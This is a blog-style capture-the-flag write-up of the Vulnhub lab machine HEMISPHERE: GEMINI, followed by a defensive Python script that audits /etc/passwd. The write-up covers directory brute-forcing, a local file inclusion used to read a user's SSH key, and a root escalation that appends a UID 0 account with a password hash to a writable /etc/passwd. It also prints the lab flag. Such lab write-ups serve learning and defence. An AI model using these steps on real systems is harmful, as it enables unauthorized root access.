Since my last post I did Brute It on THM and more or less finished TommyBoy from Vulnhub, although I had to consult a write-up for a hint or two on that one. I did most of it myself. I probably won’t write a post about it.


Difficulty: Easy
Flag: 2 (user & root)
Enumeration | Web Application | Privilege Escalation
This works better with VirtualBox rather than VMware

This is HEMISPHERE: GEMINI from Vulnhub.


This one has FTP, SSH, HTTP and SMB, all on their standard ports. However, FTP doesn’t support anonymous login and nothing is obviously available via SMB, so both are distractions. We move forward with HTTP.


robots.txt has three disallowed entries, and none of them exist lol.

Gobuster leads the way:

root@kali:/opt/vulnhub/gemini# gobuster dir -u -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt

This gets a directory called /Portal which has an index page like this:

It was presumably intentional with the view parameter but my first thought was LFI, and it was correct:

This works, and we have a user called william. Probably it’s not as simple as this, right?

Actually, it is.

root@kali:/opt/vulnhub/gemini# ssh -i id_rsa william@
The authenticity of host ' (' can't be established.
ECDSA key fingerprint is SHA256:WJJG9C/ZF8ojVDQF40UEgPCGZMEGwny3luZufN5+K30.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '' (ECDSA) to the list of known hosts.
Linux gemini 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64


william@gemini:~$ pwd


Linpeas says /etc/passwd is writeable. We know what to do with that!

william@gemini:/dev/shm$ echo "root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash" >> /etc/passwd
william@gemini:/dev/shm$ su root2
root@gemini:/dev/shm# cd /root
root@gemini:~# ls
root@gemini:~# cat root.txt 
root_flag==> vD1JA8mze74XzkmzOA21R4sjZ

Short, sweet, and done.
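
A defender-side check for the condition used in the /etc/passwd step above, as an added example that is not part of the original write-up: it flags a passwd file writable by group or others, UID 0 accounts other than root, and entries that carry a hash in the password field instead of a shadow placeholder. The sample entries other than the root2 line, the 0666 file mode, and the name audit_passwd are assumptions made for illustration.

```python
import stat

# Constructed sample: only the root2 line comes from the write-up above.
SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
william:x:1000:1000:william:/home/william:/bin/bash
root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash
"""
SAMPLE_MODE = 0o100666  # assumed mode; the write-up only says "writeable"


def audit_passwd(text, mode):
    """Return (subject, finding) pairs for passwd(5) content and its st_mode."""
    findings = []
    # /etc/passwd should be writable by its owner (root) only, i.e. 0644.
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(("file", "writable by group or others"))
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            findings.append((f"line {lineno}", "malformed entry"))
            continue
        name, passwd, uid = fields[0], fields[1], int(fields[2])
        # Any extra UID 0 account is a second root, whatever its name.
        if uid == 0 and name != "root":
            findings.append((name, "UID 0 account other than root"))
        # "x" defers to /etc/shadow; a leading "*" or "!" means locked.
        if passwd == "":
            findings.append((name, "empty password field"))
        elif passwd != "x" and passwd[0] not in "*!":
            findings.append((name, "password hash stored in passwd"))
    return findings


if __name__ == "__main__":
    for subject, finding in audit_passwd(SAMPLE, SAMPLE_MODE):
        print(f"{subject}: {finding}")
```

On a real host, pass the contents of /etc/passwd and the `st_mode` from `os.stat("/etc/passwd")` instead of the sample values.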